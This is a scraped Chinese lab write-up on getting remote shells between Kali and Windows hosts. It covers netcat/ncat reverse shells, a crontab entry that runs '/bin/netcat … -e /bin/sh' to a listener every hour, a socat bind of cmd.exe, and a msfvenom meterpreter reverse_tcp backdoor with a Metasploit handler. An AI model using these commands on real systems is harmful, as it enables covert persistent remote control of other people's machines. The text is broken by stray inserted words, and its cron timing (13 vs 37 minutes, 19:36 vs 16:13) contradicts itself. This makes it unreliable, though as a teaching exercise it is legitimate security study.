在Windows下,先使用ipconfig
指令查看本機IP:
html
使用ncat.exe
程序監聽本機的5324端口:linux
nc
指令的-e
選項反向鏈接Windows主機的5324端口:Kali
的shell
,運行ls
指令以下:過程與以前的相似,在~Kali~環境下用~ifconfig~查看IP:
web
使用~nc~指令監聽~5324~端口:
shell
在Windows下,使用~ncat.exe~程序的~-e~選項項反向鏈接Kali主機的~5324~端口:
vim
Kali下能夠看到Windows的命令提示,能夠輸入Windows命令:
windows
Windows下監聽5324
端口:網絡
Kali下鏈接到Windows的5324
端口:
tcp
創建鏈接以後,就能夠傳輸數據了,這裏傳輸的是字符串,至關於兩臺主機在聊天,也能夠用重定向操做符來傳輸文件:
編輯器
5324
端口:在Kali
環境下,使用man crontab
指令查看crontab
命令的幫助文檔,從文檔中咱們能夠知道crontab
指令能夠用於設置週期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab
文件中,以供以後讀取和執行。
工具
crontab -e
指令編輯一條定時任務,選擇編輯器時選擇基本的vim編輯器就行:用crontab -e
指令編輯一條定時任務,選擇編輯器時選擇基本的vim編輯器就行在最後一行添加13 * * * * /bin/netcat 192.168.1.103 5324 -e /bin/sh,意思是在每一個小時的第37分鐘反向鏈接Windows主機的5324端口,設置成37的緣由是我當時的時間是19點36,爲了能立馬看到效果,因此我將時間設置在了一分鐘之後:
當時間到了16點13時,此時已經得到了Kali的shell
,能夠輸入指令(若是在這以前輸入指令,屏幕上不會有顯示,可是等到了13分時會立馬顯示出來):
socat
是ncat
的加強版,它使用的格式是socat [options] <address> <address>
,其中兩個address
是必選項,而options
是可選項。
socat
的基本功能就是創建兩個雙向的字節流,數據就在其間傳輸,參數address
就是表明了其中的一個方向。所謂流,表明了數據的流向,而數據則能夠有許多不一樣的類型,命令中也就相應須要許多選項對各類不一樣的類型數據流進行限定與說明。
socat.exe
文件的路徑,在添加參數一欄填寫tcp-listen:5324 exec:cmd.exe,pty,stderr
,這個命令的做用是把cmd.exe
綁定到端口5324,同時把cmd.exe
的stderr
重定向到stdout
上:socat - tcp:192.168.1.103:5324
,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的5324端口,此時能夠發現已經成功得到了一個cmd shell
:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.128 LPORT=5324 -f exe > 2015324_backdoor.exe
生成後門程序:
經過nc指令將生成的後門程序傳送到Windows主機上:
在Kali上使用msfconsole指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口:
在msf的命令下輸入命令use exploit/multi/handler,payload設置命令set payload windows/meterpreter/reverse_tcp,繼續設置IP(此處設置虛擬機的Linux的IP地址)和端口
Linux使用exploit命令開始監聽,此時在Win上執行後門程序。
打開Windows上的後門程序:
此時Kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell:
經過本次實驗我都驚了!經過電腦直接的控制來實現一些功能,從而達到目的。因此咱們要在平常使用電腦的過程當中正確的使用,不讓居心不軌者有可乘之機。